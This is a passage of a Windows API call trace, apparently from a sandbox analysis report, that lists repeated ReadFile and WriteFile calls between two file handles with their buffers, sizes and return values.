lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.596] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.596] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x371, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.597] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.597] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x32b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.598] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.598] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3b0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.599] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.600] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x37a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.600] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.601] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x374, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.601] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.602] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x391, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.602] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.602] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.603] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3b6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.604] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.604] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3da, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.605] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.605] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3f8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.606] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.606] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3ce, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.607] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.607] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.608] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1fe, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.608] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.609] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.609] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.610] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.610] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x307, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.611] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.611] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x334, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.612] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.612] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x373, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.613] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.613] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.614] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.614] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x325, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.615] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.615] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ec, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.616] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.616] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x352, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.617] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.617] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x356, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.618] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.618] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x334, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.619] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.619] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.620] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xd, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.620] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.621] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x339, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.621] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.622] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2cf, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.624] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.624] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x38f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.625] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.625] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x385, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.626] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.626] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x34a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.627] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.627] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.628] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x31, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.628] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.629] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3b2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.629] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.630] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.631] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.631] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.632] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.632] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x59, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.633] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.633] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3fa, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.634] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.634] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.635] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x7f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.635] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.636] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.636] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xcc, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.637] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.637] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.638] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.638] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.639] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.639] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x72, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.640] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.640] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.641] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xa4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.641] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.642] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.642] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.643] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.643] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.644] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xc3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.644] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.645] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3b0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.645] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.646] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.647] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xfc, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.647] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1e4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1ac, lpOverlapped=0x0 | out: lpBuffer=0x4bd1e4*, lpNumberOfBytesRead=0x4bd1ac*=0x200, lpOverlapped=0x0) returned 1 [0021.648] WriteFile (in: 